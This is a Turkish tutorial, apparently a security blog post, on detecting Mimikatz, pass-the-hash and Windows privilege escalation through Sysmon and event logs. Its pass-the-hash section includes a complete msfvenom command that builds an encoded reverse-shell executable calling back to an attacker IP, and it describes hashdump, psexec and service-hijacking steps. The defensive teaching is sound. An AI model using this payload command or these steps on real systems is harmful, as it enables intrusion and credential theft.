Sysmon ile Log Analizi

Sysmon’a Giriş ve Kurulum

1. Giriş

Bilgi sistemlerinin en önemli faaliyetlerinden biri log kaydı tutmaktır. Log kayıtları sayesinde sisteme bir saldırının ne zaman, nasıl ve nereden yapıldığını öğrenmek mümkündür.

Makale boyunca Microsoft tarafından geliştirilen Sysmon aracının kullanımı ve Windows işletim sistemlerinde sıklıkla görülen çeşitli saldırı türlerinin analizi tanıtılacaktır.

2. Sistem

Sysmon (sistem monitörü), Microsoft tarafından geliştirilen, kurulu olduğu sistemdeki etkinlikleri kaydeden bir araçtır.

2.1. Kurulum

Sysmon: https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon .

Daha sonra “cmd” ile indirilen dosyanın bulunduğu dizine gidilerek “ Sysmon.exe -i -accepteula ” komutu ile varsayılan ayarlarda kurulum yapılır.

2.2. Yapılandırma

Sysmon kurulduğunda kendi varsayılan yapılandırma dosyasıyla kurulur. Ancak kullanıcının kendi konfigürasyon dosyasını oluşturması da mümkündür. Sysmon, yapılandırma için XML dosya biçimini kullanır.

Yapılandırma dosyası için 2 ana bölüm vardır: HashAlgorithms ve EventFiltering.

HashAlgorithms bölümünde oluşturulan işlemler hangi karma algoritmaların kullanılacağını belirtmek için kullanılırken EventFiltering, özel olarak izlenen veya hariç tutulan olayları tanımlamak için kullanılır.

Olayları dahil etmek veya hariç tutmak için aşağıdaki modeller kullanılır. Dahil etmek için “include” ifadeleri, hariç tutmak için “exclude” ifadeleri kullanılır.

Filtrelemede kullanılan etiketler aşağıdaki görselde belirtilmiştir.

Aşağıdaki örnekte Sysmon, sürecin oluşturulması sırasında herhangi bir günlük kaydı yapmayacaktır.

condition türleri ve özellikleri:

2.3. Olaylar

Sysmon tarafından oluşturulan kayıtlara Olay Görüntüleyici aracılığıylaApplications and Services Logs/Microsoft/Windows/Sysmon/Operational” seçeneğine tıklanarak erişilebilir .

Kayıtlardaki Event ID’lerin anlamları aşağıdaki görselde verilmiştir.

2.4. Hash’ler

Çoğu kayıt sürecin hash değerlerini gösterir. Şüpheli bir kayıt görüldüğü takdirde virustotal gibi siteler üzerinden ilgili hash aranabilir.

Sysmon ile Mimikatz’ı tespit etmek

Sysmon

Sysmon, Microsoft tarafından geliştirilen, cihazın aktivitelerinin kaydedilmesini sağlayan bir araçtır. Süreçler ve ağ bağlantıları gibi faaliyetlere ilişkin detaylı bilgiler içerir ve anormal durumların tespit edilmesini sağlar. Kurulum ve konfigürasyona ilişkin detaylı bilgiye Microsoft’un web sitesinden ulaşılabilir.

https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

Mimikatz

Windows sistemlerinde bellekten şifre almak için kullanılan bir araçtır.

Mimikatz : https://github.com/gentilkiwi/mimikatz

Sysmon kullanarak sistemdeki mimikatz’ı tespit etmenin 3 farklı yolundan bahsedeceğiz:

  • Mimikatz adlı dosyaları izleme
  • Hash izleme
  • “lsass.exe”yi izleme

Mimikatz adlı dosyaları izleme

Sistemde oluşturulan “mimikatz” isimli dosyaların izlenmesi tespit için bir seçenektir. Ancak dosya adı kolayca değiştirilebilir, dolayısıyla atlanması kolaydır.

Sysmon yapılandırması:

Sysmon çıkışı:

Çıktıya bakıldığında “mimikatz.exe” dosyasının sıkıştırılmış dosyadan çıkarıldığı anlaşılmaktadır.

Hash İzleme

Mimikatz’a ait hash değerlerine sahip bir işlem başlatıldığında Sysmon’un uyarı üretmesi sağlanabilir. Dosyada yapılacak küçük bir değişiklikle hash değeri yenileneceği için bu yöntem de pek sağlıklı değildir.

“mimikatz.exe” hash değerine bakıldığında “010D11288BAF561F633D674E715A2016” olduğu görülmektedir.

Dosyaya küçük bir ekleme yapıldığında hash değeri değişecektir.

“010D11288BAF561F633D674E715A2016” karma değerine sahip dosyanın yürütülüp yürütülmediğini görmek için gereken yapılandırma:

Sysmon çıkışı:

“lsass.exe” takibi

Mimikatz, parolaları yakalamak için lsass.exe’yi kullanır. “lsass.exe” izlemesi ile onu kullanan işlemler de kayıt altına alınır. Bu sayede sadece mimikatz değil, lsass.exe’yi kullanan tüm şüpheli işlemler kayıt altına alınmaktadır.

Yapılandırma :

Daha etkili sonuçlar elde etmek için yasal faaliyetler için “lsass.exe”yi çağıran işlemler hariç tutulabilir.

Sysmon çıkışı:

Sysmon ile Hash Geçişini Tespit Etme

Hash’ı Geç

Karmayı geçirme, saldırganın parola kullanmak yerine karma kullanarak hedefe bağlanmasına olanak tanıyan, Windows sistemlerini hedef alan bir saldırıdır.

Lsass.exe üzerinde şifre hashleri ​​mevcut olup, hash elde etmek için Gsecdump, pwdump7, mimikatz, Metasploit hashdump modülü gibi çeşitli araçlar üretilmiştir. Bu araçlar yetkili kullanıcılar tarafından çalıştırıldığında istenilen veriler elde edilir.

3.1. Örnek Saldırı

Hedef sistemle ilk temasın kurulması için mağdura e-posta veya diğer yöntemlerle kötü amaçlı yazılım gönderilir. Bu saldırı için kötü amaçlı yazılım msfvenom ile oluşturuldu.

(msfvenom ile reverse shell oluşturuldu)

Komut: msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp lhost=192.168.2.120 lport=4343 -b ‘\x00’ -e x86/shikata_ga_nai -f exe -o shell.ex

Kötü amaçlı yazılım kurbana gönderildikten sonra ölçüm cihazı oturumu bekleniyor.

(Mağdurun dosyayı açması bekleniyor)Hedef kişi dosyayı açtığında Meterpreter oturumu başlar.

Oturum sonrasında hashdump modülü kullanılarak şifre hashleri ​​elde edilir ancak gerekli ayrıcalıklar mevcut olmadığından işlem gerçekleştirilemez.

Bu durumda hedef sistemdeki ayrıcalıkların yükseltilmesi gerekmektedir.

“ps” komutu ile sistem üzerinde çalışan işlemler listelenir ve NT AUTHORITY\SYSTEM yetkisi ile çalışan işlemler aranır.

İlgili proses bulunduktan sonra “migrate” komutu ile prosese geçilir ve sistem ayrıcalıklarına erişilir.

Ulaşılması gereken en yüksek ayrıcalıklara sahip olunduktan sonra hashdump modülü ile şifre hashleri ​​elde edilir.

Hash’ler elde edildikten sonra ilgili veriler Metasploit’teki psexec modülüne yüklenerek saldırı başlatılır ve admin kullanıcı tarafından sisteme erişim sağlanır.

Gördüğünüz gibi pass-the-hash saldırısı ile yönetici kullanıcının şifresi bilinmese bile hash değerini kullanarak geçiş yapmak mümkün.

3.2. Saldırının Tespiti

Pass the hash saldırısı ile ağ üzerinde normal davranış sergilendiğinden, saldırının tespitinde ağ trafiğinin incelenmesi oldukça sorunlu olacaktır. Bu nedenle log kayıtlarını “Olay Görüntüleyici” ile incelemek daha mantıklı olacaktır.

Öncelikle oturum kayıtlarının tutulmasını sağlamak için “Yerel Grup politika düzenleyicisini” açın ve “Hesap oturum açma olaylarını denetle” bölümünde Başarılı ve Başarısız seçeneklerinin aktif olup olmadığını kontrol edin.

Daha sonra kullanıcı oturum kayıtları Olay Görüntüleyici ile incelenir.

Burada arama yapılırken öncelikle 4624 “event id” numaralı kayıtlar incelenir. 4624 ID’li kayıtlar sisteme başarıyla giriş yapılan oturumları temsil etmektedir.

“Oturum açma türü” 3 ile kalan kayıtlara devam edin. Oturum açma türü 3, ağdaki başka bir yerden sisteme bağlanmayı temsil eder.

Geçiş karma saldırılarında “Güvenlik Kimliği” genellikle “BOŞ SID”dir.

Bu çıkarımlara ek olarak “Oturum Açma İşlemi” NtLmSsP ve “Anahtar Uzunluğu” 0 olan kayıtlar aranır. RDP gibi normal bir bağlantıda anahtar uzunluğu 128 bittir.

Bahsi geçen çıkarımlar yapıldıktan sonra sisteme yapılan hash saldırılarının geçişleri tespit edilecektir.

Yukarıdaki görüntülerde görülen kayıtta saldırının tüm belirtileri mevcut. Bunlara ek olarak 2. görseldeki Workstation isminin rastgele bir ifade olması da dikkat çekiyor.

Sonuç olarak 192.168.2.120 IP adresine sahip saldırganın pass-the-hash saldırısı ile “admin” kullanıcı olarak sisteme sızdığı anlaşılmaktadır.

Sisteme sızan bir saldırganın “Pass The Hash” yöntemi ile giriş olay logları ile nasıl tespit edileceğini anlattık. Sysmon sayesinde saldırganın istismar sonrası faaliyetleri kolaylıkla yakalanabilmektedir. Daha önceki konularda da bahsettiğimiz gibi “ID: 1 – Process Create” logu sayesinde oluşturulan proseslere ve detaylarına ulaşılabilir. Sysmon’un sunduğu diğer logları takip etmek gerekiyor, “Process Create” logları ile anormal aktiviteleri yakalamak daha kolay olacağından bu loga daha çok odaklanılıyor.

Kısaca Sysmon sayesinde saldırganın sistemde attığı adımları adım adım takip ediyoruz.

Sysmon ile Ayrıcalık Artışını Tespit Etme

Ayrıcalık Yükseltmesi

Sistemdeki hatalar veya yanlış yapılandırmalar kullanılarak üst düzey ayrıcalıklara erişilmesi, ayrıcalık yükseltme olarak tanımlanır. Bazı ayrıcalık yükseltme teknikleri aşağıda tartışılmaktadır.

4.1. Zayıf Hizmet İzinleri

Kullanıcılara sahip olmaları gerekmeyen servis izinleri verildiğinde servislerin başlatılması, durdurulması, ayarlarının değiştirilmesi gibi ayrıcalıklar da verilmiş olur.

Aşağıda hizmet izinleriyle ilgili bir ayrıcalık yükseltme örneği verilmiştir.

Sistemde herhangi bir yetkisi bulunmayan “Ali” kullanıcısı sistem üzerindeki servisleri incelemeye başlar ve ‘GÜNCELLEME’ servisi dikkatini çeker.

“accesschk” aracı ile servisin izinlerini inceler ve herkesin servisi değiştirme hakkına sahip olduğunu görür.

Daha sonra ‘UPDATE’ servisinin çalıştırdığı dosyanın yolunu değiştirerek onu oluşturduğu zararlı yazılıma yönlendiriyor ve servisi başlatıyor.

Ve sistem ayrıcalıklarıyla çalıştırılan sistem, saldırganın oluşturduğu kötü amaçlı yazılımı açarak saldırganın sistem ayrıcalıklarına erişmesine olanak sağladı.

Sysmon ile log kayıtlarına bakıldığında Event ID 13 olan Register’ın değiştirildiği görülmektedir. Güncellenen dosya, üzerinde yapılan değişiklikleri gösterir. 

İlgili değişikliğin nasıl yapıldığını anlamak için önceki log kayıtlarının incelenmesi gerekmektedir.

Değişiklikleri yapan saldırgan, hizmeti başlattı ve aynı zamanda kötü amaçlı yazılımı çalıştırarak sistem ayrıcalıklarını ele geçirdi.

Event ID 3 olan kayıtlara bakıldığında saldırgana NT AUTHORITY\SYSTEM ayrıcalıklarına sahip bağlantı açıldığı görülmektedir.

4.2. Güvenli Olmayan Kayıt İzinleri

Kayıt defterinde değişiklik yapma hakkı yalnızca yetkili kullanıcılara verilmelidir. Aşağıdaki örnekte “Kimliği Doğrulanmış Kullanıcılar” grubuna “GÜNCELLEME” hizmeti için tam yetki verilmiştir.

Sistemde tam yetkiye sahip olmayan “Ali” kullanıcısı ilgili hizmetin ImagePath değerini değiştirerek kendisini oluşturduğu kötü amaçlı yazılıma yönlendirmektedir.

Hizmet başlatıldığında saldırgan kendi sunucusu üzerinden hedef sistem üzerinde NT AUTHORITY\SYSTEM ayrıcalıklarına ulaşmış olacaktır.

Sysmon günlüklerine bakıldığında Ali kullanıcısının cmd aracılığıyla kayıt defterini değiştirmeye çalıştığı doğrulanabilir.

Ali kullanıcısının yaptığı değişiklik, oturum açan kullanıcıların kayıt defterinde değişiklik yapma hakkına sahip olması nedeniyle kabul edildi. Etkinlik kimliğinin 13 olması, değişikliğin kaydedildiğini gösterir.

4.3. Metasploit Getsystem Komutu

Metasploit’te Meterpreter oturumu alındıktan sonra “getsystem” komutu ile ayrıcalık yükseltmeye çalışılır.

Sysmon ile kayıtlara bakıldığında rastgele ifadeden oluşan servis oluşturulmuş ve cmd.exe ile canlandırılmaya başlanmıştır. Böylece cmd’ye “NT AUTHORITY\SYSTEM” ayrıcalıklarıyla erişildi.

Çözüm

Sysmon ile sistem üzerindeki aktivitelerin nasıl analiz edileceği anlatılmıştır. Aynı zamanda Windows’a yönelik popüler saldırıların Sysmon ile nasıl tespit edilip analiz edileceği de tartışılıyor.

Yorum bırakın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Scroll to Top